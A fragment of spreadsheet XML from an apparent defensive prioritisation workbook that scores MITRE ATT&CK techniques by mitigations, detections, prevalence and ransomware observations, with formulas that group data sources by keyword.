      <c r="I483" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J483" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K483" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L483" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M483" s="37">
        <v>0</v>
      </c>
      <c r="N483" s="56">
        <v>0</v>
      </c>
      <c r="O483" s="56">
        <v>0</v>
      </c>
      <c r="P483" s="56">
        <v>0</v>
      </c>
      <c r="Q483" s="56">
        <v>0</v>
      </c>
      <c r="R483" s="57" t="s">
        <v>1684</v>
      </c>
      <c r="S483" s="57">
        <v>3</v>
      </c>
      <c r="T483" s="57" t="s">
        <v>1685</v>
      </c>
      <c r="U483" s="57">
        <v>8</v>
      </c>
      <c r="V483" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.10476190476190478</v>
      </c>
      <c r="W483" s="37">
        <v>11</v>
      </c>
      <c r="X483" s="37">
        <v>0.2</v>
      </c>
      <c r="Y483" s="37">
        <v>0.2</v>
      </c>
      <c r="Z483" s="37">
        <v>0</v>
      </c>
      <c r="AA483" s="37">
        <v>0</v>
      </c>
      <c r="AB483" s="37">
        <v>0</v>
      </c>
      <c r="AC483" s="37"/>
      <c r="AD483" s="50" t="s">
        <v>602</v>
      </c>
      <c r="AE483" s="37" t="str" cm="1">
        <f t="array" ref="AE483">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD483)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF483" s="37">
        <v>479</v>
      </c>
      <c r="AG483" s="37" t="str" cm="1">
        <f t="array" ref="AG483">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD483)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH483" s="37">
        <v>479</v>
      </c>
      <c r="AI483" s="37" t="str" cm="1">
        <f t="array" ref="AI483">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD483)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ483" s="37">
        <v>479</v>
      </c>
      <c r="AK483" s="37" t="str" cm="1">
        <f t="array" ref="AK483">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD483)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL483" s="37">
        <v>479</v>
      </c>
      <c r="AM483" s="37" t="str" cm="1">
        <f t="array" ref="AM483">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD483)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN483" s="37">
        <v>0</v>
      </c>
      <c r="AO483" s="37">
        <v>1</v>
      </c>
      <c r="AP483" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ483" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>162.79285714285717</v>
      </c>
      <c r="AR483" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS483" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT483" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU48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3.8998299319727892</v>
      </c>
    </row>
    <row r="484" spans="1:47" ht="34">
      <c r="A484" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B484" s="37">
        <f t="shared" si="7"/>
        <v>246.98571428571427</v>
      </c>
      <c r="C484" s="37" t="s">
        <v>1686</v>
      </c>
      <c r="D484" s="50" t="s">
        <v>1683</v>
      </c>
      <c r="E484" s="37" t="s">
        <v>1687</v>
      </c>
      <c r="F484" s="37">
        <v>1</v>
      </c>
      <c r="G484" s="37">
        <v>1</v>
      </c>
      <c r="H484" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I484" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J484" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K484" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L484" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M484" s="37">
        <v>0</v>
      </c>
      <c r="N484" s="56">
        <v>0</v>
      </c>
      <c r="O484" s="56">
        <v>2</v>
      </c>
      <c r="P484" s="56">
        <v>3</v>
      </c>
      <c r="Q484" s="56">
        <v>1</v>
      </c>
      <c r="R484" s="57"/>
      <c r="S484" s="57">
        <v>0</v>
      </c>
      <c r="T484" s="57"/>
      <c r="U484" s="57">
        <v>0</v>
      </c>
      <c r="V484" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>2.8571428571428567E-2</v>
      </c>
      <c r="W484" s="37">
        <v>0</v>
      </c>
      <c r="X484" s="37">
        <v>0</v>
      </c>
      <c r="Y484" s="37">
        <v>0</v>
      </c>
      <c r="Z484" s="37">
        <v>6</v>
      </c>
      <c r="AA484" s="37">
        <v>0.06</v>
      </c>
      <c r="AB484" s="37">
        <v>0.06</v>
      </c>
      <c r="AC484" s="37"/>
      <c r="AD484" s="50" t="s">
        <v>136</v>
      </c>
      <c r="AE484" s="37" t="str" cm="1">
        <f t="array" ref="AE484">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD484)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF484" s="37">
        <v>480</v>
      </c>
      <c r="AG484" s="37" t="str" cm="1">
        <f t="array" ref="AG484">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD484)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH484" s="37">
        <v>480</v>
      </c>
      <c r="AI484" s="37" t="str" cm="1">
        <f t="array" ref="AI484">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD484)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ484" s="37">
        <v>480</v>
      </c>
      <c r="AK484" s="37" t="str" cm="1">
        <f t="array" ref="AK484">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD484)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL484" s="37">
        <v>480</v>
      </c>
      <c r="AM484" s="37" t="str" cm="1">
        <f t="array" ref="AM484">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD484)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN484" s="37">
        <v>0</v>
      </c>
      <c r="AO484" s="37">
        <v>0</v>
      </c>
      <c r="AP484" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ484" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>82.328571428571422</v>
      </c>
      <c r="AR484" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS484" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT484" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU48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85" spans="1:47" ht="17">
      <c r="A485" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B485" s="37">
        <f t="shared" si="7"/>
        <v>394.16666666666669</v>
      </c>
      <c r="C485" s="37" t="s">
        <v>1688</v>
      </c>
      <c r="D485" s="50" t="s">
        <v>1683</v>
      </c>
      <c r="E485" s="37" t="s">
        <v>1689</v>
      </c>
      <c r="F485" s="37">
        <v>1</v>
      </c>
      <c r="G485" s="37">
        <v>1</v>
      </c>
      <c r="H485" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I485" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J485" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K485" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L485" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M485" s="37">
        <v>0</v>
      </c>
      <c r="N485" s="56">
        <v>0</v>
      </c>
      <c r="O485" s="56">
        <v>0</v>
      </c>
      <c r="P485" s="56">
        <v>0</v>
      </c>
      <c r="Q485" s="56">
        <v>0</v>
      </c>
      <c r="R485" s="57" t="s">
        <v>1684</v>
      </c>
      <c r="S485" s="57">
        <v>3</v>
      </c>
      <c r="T485" s="57" t="s">
        <v>1685</v>
      </c>
      <c r="U485" s="57">
        <v>8</v>
      </c>
      <c r="V485" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.10476190476190478</v>
      </c>
      <c r="W485" s="37">
        <v>11</v>
      </c>
      <c r="X485" s="37">
        <v>0.2</v>
      </c>
      <c r="Y485" s="37">
        <v>0.2</v>
      </c>
      <c r="Z485" s="37">
        <v>0</v>
      </c>
      <c r="AA485" s="37">
        <v>0</v>
      </c>
      <c r="AB485" s="37">
        <v>0</v>
      </c>
      <c r="AC485" s="37"/>
      <c r="AD485" s="50" t="s">
        <v>1690</v>
      </c>
      <c r="AE485" s="37" t="str" cm="1">
        <f t="array" ref="AE485">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD485)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF485" s="37">
        <v>481</v>
      </c>
      <c r="AG485" s="37" t="str" cm="1">
        <f t="array" ref="AG485">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD485)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH485" s="37">
        <v>481</v>
      </c>
      <c r="AI485" s="37" t="str" cm="1">
        <f t="array" ref="AI485">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD485)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ485" s="37">
        <v>481</v>
      </c>
      <c r="AK485" s="37" t="str" cm="1">
        <f t="array" ref="AK485">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD485)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL485" s="37">
        <v>481</v>
      </c>
      <c r="AM485" s="37" t="str" cm="1">
        <f t="array" ref="AM485">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD485)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN485" s="37">
        <v>0</v>
      </c>
      <c r="AO485" s="37">
        <v>0</v>
      </c>
      <c r="AP485" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ485" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>131.38888888888889</v>
      </c>
      <c r="AR485" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS485" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT485" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU48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86" spans="1:47" ht="17">
      <c r="A486" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B486" s="37">
        <f t="shared" si="7"/>
        <v>303.12857142857143</v>
      </c>
      <c r="C486" s="37" t="s">
        <v>1691</v>
      </c>
      <c r="D486" s="50" t="s">
        <v>1683</v>
      </c>
      <c r="E486" s="37" t="s">
        <v>1692</v>
      </c>
      <c r="F486" s="37">
        <v>1</v>
      </c>
      <c r="G486" s="37">
        <v>1</v>
      </c>
      <c r="H486" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I486" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J486" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K486" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L486" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M486" s="37">
        <v>0</v>
      </c>
      <c r="N486" s="56">
        <v>0</v>
      </c>
      <c r="O486" s="56">
        <v>4</v>
      </c>
      <c r="P486" s="56">
        <v>3</v>
      </c>
      <c r="Q486" s="56">
        <v>5</v>
      </c>
      <c r="R486" s="57"/>
      <c r="S486" s="57">
        <v>0</v>
      </c>
      <c r="T486" s="57"/>
      <c r="U486" s="57">
        <v>0</v>
      </c>
      <c r="V486" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>5.7142857142857134E-2</v>
      </c>
      <c r="W486" s="37">
        <v>0</v>
      </c>
      <c r="X486" s="37">
        <v>0</v>
      </c>
      <c r="Y486" s="37">
        <v>0</v>
      </c>
      <c r="Z486" s="37">
        <v>12</v>
      </c>
      <c r="AA486" s="37">
        <v>0.12</v>
      </c>
      <c r="AB486" s="37">
        <v>0.12</v>
      </c>
      <c r="AC486" s="37"/>
      <c r="AD486" s="50" t="s">
        <v>75</v>
      </c>
      <c r="AE486" s="37" t="str" cm="1">
        <f t="array" ref="AE486">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD486)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF486" s="37">
        <v>482</v>
      </c>
      <c r="AG486" s="37" t="str" cm="1">
        <f t="array" ref="AG486">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD486)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH486" s="37">
        <v>482</v>
      </c>
      <c r="AI486" s="37" t="str" cm="1">
        <f t="array" ref="AI486">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD486)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ486" s="37">
        <v>482</v>
      </c>
      <c r="AK486" s="37" t="str" cm="1">
        <f t="array" ref="AK486">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD486)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL486" s="37">
        <v>482</v>
      </c>
      <c r="AM486" s="37" t="str" cm="1">
        <f t="array" ref="AM486">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD486)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN486" s="37">
        <v>0</v>
      </c>
      <c r="AO486" s="37">
        <v>0</v>
      </c>
      <c r="AP486" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ486" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>101.04285714285714</v>
      </c>
      <c r="AR486" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS486" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT486" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU48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87" spans="1:47" ht="68">
      <c r="A487" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B487" s="37">
        <f t="shared" si="7"/>
        <v>2070.4243338095239</v>
      </c>
      <c r="C487" s="37" t="s">
        <v>1693</v>
      </c>
      <c r="D487" s="50" t="s">
        <v>1694</v>
      </c>
      <c r="E487" s="37"/>
      <c r="F487" s="37">
        <v>2</v>
      </c>
      <c r="G487" s="37">
        <v>2</v>
      </c>
      <c r="H487" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.2</v>
      </c>
      <c r="I487" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J487" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K487" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L487" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M487" s="37">
        <v>0.66633200000000004</v>
      </c>
      <c r="N487" s="56">
        <v>1</v>
      </c>
      <c r="O487" s="56">
        <v>0</v>
      </c>
      <c r="P487" s="56">
        <v>0</v>
      </c>
      <c r="Q487" s="56">
        <v>0</v>
      </c>
      <c r="R487" s="57" t="s">
        <v>757</v>
      </c>
      <c r="S487" s="57">
        <v>7</v>
      </c>
      <c r="T487" s="57" t="s">
        <v>1695</v>
      </c>
      <c r="U487" s="57">
        <v>14</v>
      </c>
      <c r="V487" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.20476180952380954</v>
      </c>
      <c r="W487" s="37">
        <v>21</v>
      </c>
      <c r="X487" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Y487" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Z487" s="37">
        <v>1</v>
      </c>
      <c r="AA487" s="37">
        <v>0.01</v>
      </c>
      <c r="AB487" s="37">
        <v>0.01</v>
      </c>
      <c r="AC487" s="37"/>
      <c r="AD487" s="50" t="s">
        <v>1696</v>
      </c>
      <c r="AE487" s="37" t="str" cm="1">
        <f t="array" ref="AE487">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD487)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF487" s="37">
        <v>483</v>
      </c>
      <c r="AG487" s="37" t="str" cm="1">
        <f t="array" ref="AG487">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD487)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH487" s="37">
        <v>483</v>
      </c>
      <c r="AI487" s="37" t="str" cm="1">
        <f t="array" ref="AI487">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD487)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ487" s="37">
        <v>483</v>
      </c>
      <c r="AK487" s="37" t="str" cm="1">
        <f t="array" ref="AK487">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD487)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL487" s="37">
        <v>483</v>
      </c>
      <c r="AM487" s="37" t="str" cm="1">
        <f t="array" ref="AM487">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD487)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN487" s="37">
        <v>0</v>
      </c>
      <c r="AO487" s="37">
        <v>2</v>
      </c>
      <c r="AP487" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ487" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>690.14144460317459</v>
      </c>
      <c r="AR487" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS487" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT487" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU48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32.911497362055933</v>
      </c>
    </row>
    <row r="488" spans="1:47" ht="51">
      <c r="A488" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B488" s="37">
        <f t="shared" si="7"/>
        <v>913.15751180952384</v>
      </c>
      <c r="C488" s="37" t="s">
        <v>1697</v>
      </c>
      <c r="D488" s="50" t="s">
        <v>1694</v>
      </c>
      <c r="E488" s="37" t="s">
        <v>1698</v>
      </c>
      <c r="F488" s="37">
        <v>1</v>
      </c>
      <c r="G488" s="37">
        <v>1</v>
      </c>
      <c r="H488" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I488" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J488" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K488" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L488" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M488" s="37">
        <v>0</v>
      </c>
      <c r="N488" s="56">
        <v>4</v>
      </c>
      <c r="O488" s="56">
        <v>40</v>
      </c>
      <c r="P488" s="56">
        <v>3</v>
      </c>
      <c r="Q488" s="56">
        <v>5</v>
      </c>
      <c r="R488" s="57" t="s">
        <v>1201</v>
      </c>
      <c r="S488" s="57">
        <v>6</v>
      </c>
      <c r="T488" s="57" t="s">
        <v>1699</v>
      </c>
